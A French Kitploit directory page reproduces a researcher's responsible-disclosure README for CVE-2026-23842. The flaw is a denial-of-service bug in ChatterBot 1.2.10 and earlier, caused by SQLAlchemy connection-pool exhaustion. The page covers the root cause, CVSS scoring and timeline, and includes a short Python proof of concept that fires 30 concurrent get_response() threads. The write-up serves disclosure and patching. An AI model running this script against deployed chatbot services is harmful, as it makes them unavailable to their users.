Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2026-23842-Denial-of-Service-via-Database-Connection-Pool-Exhaustion-version-1.2.10 — CVE-2026-23842 — Vulnérabilité de déni de service de sévérité élevée causée par l'épuisement du pool de connexions SQLAlchemy lors d'appels concurrents à get_response() dans ChatterBot ≤ 1.2.10. | Kitploit
Outils/GitHubGitHub/adityabhatt3010/cve-2026-23842-denial-of-service-via-database-connection-pool-exhaustion-version-1.2.10
Analyse des VulnérabilitésExploitationApprentissage et Éducation
GitHubadityabhatt3010/cve-2026-23842-denial-of-service-via-database-connection-pool-exhaustion-version-1.2.10

CVE-2026-23842-Denial-of-Service-via-Database-Connection-Pool-Exhaustion-version-1.2.10

CVE-2026-23842 — Vulnérabilité de déni de service de sévérité élevée causée par l'épuisement du pool de connexions SQLAlchemy lors d'appels concurrents à get_response() dans ChatterBot ≤ 1.2.10.

Voir le dépôt
2il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

CVE-2026-23842

Déni de service via épuisement du pool de connexions de base de données dans ≤ 1.2.10

📌 Aperçu

Ce dépôt documente ma découverte et ma divulgation responsable de la CVE-2026-23842, une vulnérabilité de déni de service de haute sévérité dans ChatterBot.

  • Avis GitHub : GHSA-v4w8-49pv-mf72
  • ID CVE : CVE-2026-23842
  • CWE : CWE-400 (Consommation de ressources non contrôlée)
  • Sévérité : Élevée (7,5 / 10)
  • CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H

a-hyper-detailed-cinematic-cyberpunk-ill_1YpmQcKtTGuYYByf5li18A_s2g_3oZVSIyO44oyprigwQ_cover_sd


🚨 Résumé de la vulnérabilité

Les versions de ChatterBot ≤ 1.2.10 sont vulnérables à une condition de déni de service causée par une gestion inappropriée des sessions et du pool de connexions de la base de données.

Les invocations simultanées de :

root@kitploit:~
get_response()

peuvent épuiser le QueuePool sous-jacent de SQLAlchemy, entraînant :

  • Le blocage de l'application
  • sqlalchemy.exc.TimeoutError
  • Une indisponibilité persistante du service
  • Un redémarrage manuel nécessaire pour la récupération

🎯 Versions concernées

root@kitploit:~
<= 1.2.10

✅ Version corrigée

root@kitploit:~
>= 1.2.11

🧠 Cause racine technique

ChatterBot s'appuie sur SQLAlchemy pour l'interaction avec la base de données et utilise une configuration de pool de connexions par défaut.

Cependant :

  • Aucune limitation de concurrence
  • Aucune limitation du débit de requêtes
  • Aucune application explicite du cycle de vie des sessions
  • Limites par défaut du QueuePool

Lorsque plusieurs threads invoquent get_response() simultanément :

  1. Les connexions sont rapidement extraites du pool
  2. Les connexions ne sont pas libérées assez rapidement
  3. La capacité du pool est atteinte
  4. Les requêtes supplémentaires se bloquent
  5. SQLAlchemy lève TimeoutError

Cela entraîne un déni de disponibilité à l'échelle du service.


🔬 Preuve de concept (PoC)

Script PoC

root@kitploit:~
from chatterbot import ChatBot
import threading

bot = ChatBot("dos-test")

def attack():
    bot.get_response("hello")

threads = []

for _ in range(30):
    t = threading.Thread(target=attack)
    t.start()
    threads.append(t)

for t in threads:
    t.join()

🎥 Démonstration vidéo du PoC

La vidéo suivante démontre :

  • L'exécution simultanée de threads
  • L'épuisement du QueuePool de SQLAlchemy
  • Les exceptions TimeoutError
  • Le manque de réactivité de l'application

🔗 Vidéo du PoC : https://github.com/user-attachments/assets/4ee845c4-b847-4854-84ec-4b2fb2f7090f


🌐 Surface d'attaque

S'il est déployé comme :

  • API de chatbot publique
  • Service de chatbot SaaS
  • Assistant intégré au web

Un attaquant peut déclencher la condition à distance sans authentification.


📊 Répartition CVSS v3.1

MétriqueValeur
Vecteur d'attaqueRéseau
Complexité d'attaqueFaible
Privilèges requisAucun
Interaction utilisateurAucune
ConfidentialitéAucune
IntégritéAucune
DisponibilitéÉlevée

📅 Chronologie de divulgation responsable

DateÉvénement
9 janv.Vulnérabilité signalée
13 janv.Le mainteneur a reproduit le problème
17 janv.Avis publié
19 janv.CVE-2026-23842 attribuée
21 janv.Publication publique

🏆 Crédit

Découverte et divulgation responsable par :

Aditya Bhatt Spécialiste VAPT Rapporteur de la CVE-2026-23842


🔐 Déclaration de divulgation responsable

Cette vulnérabilité a été divulguée de manière responsable au mainteneur avant la publication publique. Aucun exploit n'a été partagé publiquement avant la disponibilité du correctif.


Télécharger l’outil